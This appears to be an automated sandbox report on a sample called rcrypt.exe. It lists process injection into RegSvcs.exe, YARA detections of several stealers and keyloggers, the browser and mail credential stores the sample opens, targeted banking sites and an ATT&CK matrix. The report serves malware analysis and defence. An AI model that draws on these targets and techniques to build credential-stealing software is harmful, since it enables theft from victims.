Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: RegSvcs.exe, 00000002.00000002.3770897205.0000000000E45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: RegSvcs.exe, 00000002.00000002.3774685263.00000000042C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\rcrypt.exe	API call chain: ExitProcess graph end node	graph_0-98174
Source: C:\Users\user\Desktop\rcrypt.exe	API call chain: ExitProcess graph end node	graph_0-98240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 2_2_053B8450 LdrInitializeThunk,

2_2_053B8450

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_001641FD BlockInput,

0_2_001641FD

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_000F3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_000F3B4C

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_00125CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00125CCC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

2_2_004019F0

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_0016C304 LoadLibraryA,GetProcAddress,

0_2_0016C304

Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_016F34E0 mov eax, dword ptr fs:[00000030h]	0_2_016F34E0
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_016F3480 mov eax, dword ptr fs:[00000030h]	0_2_016F3480
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_016F1E70 mov eax, dword ptr fs:[00000030h]	0_2_016F1E70

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_001481F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_001481F7

Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0011A364 SetUnhandledExceptionFilter,	0_2_0011A364
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0011A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0011A395
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004123F1 SetUnhandledExceptionFilter,	2_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\rcrypt.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\rcrypt.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8FC008

Jump to behavior

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_00148C93 LogonUserW,

0_2_00148C93

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_000F3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_000F3B4C

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_000F4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_000F4A35

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_00154EC9 mouse_event,

0_2_00154EC9

Source: C:\Users\user\Desktop\rcrypt.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\rcrypt.exe"

Jump to behavior

Source: C:\Users\user\Desktop\rcrypt.exe

0_2_001481F7

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_00154C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00154C03

Source: rcrypt.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: rcrypt.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_0011886B cpuid

0_2_0011886B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

2_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_001250D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_001250D7

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_00132230 GetUserNameW,

0_2_00132230

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_0012418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0012418A

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_000F4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_000F4AFE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3774685263.0000000004006000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7692, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7692, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: rcrypt.exe	Binary or memory string: WIN_81
Source: rcrypt.exe	Binary or memory string: WIN_XP
Source: rcrypt.exe	Binary or memory string: WIN_XPe
Source: rcrypt.exe	Binary or memory string: WIN_VISTA
Source: rcrypt.exe	Binary or memory string: WIN_7
Source: rcrypt.exe	Binary or memory string: WIN_8
Source: rcrypt.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3774685263.0000000004006000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772899142.000000000306F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7692, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3774685263.0000000004006000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7692, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7692, type: MEMORYSTR

Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00166596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00166596
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00166A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00166A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 Software Packing	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
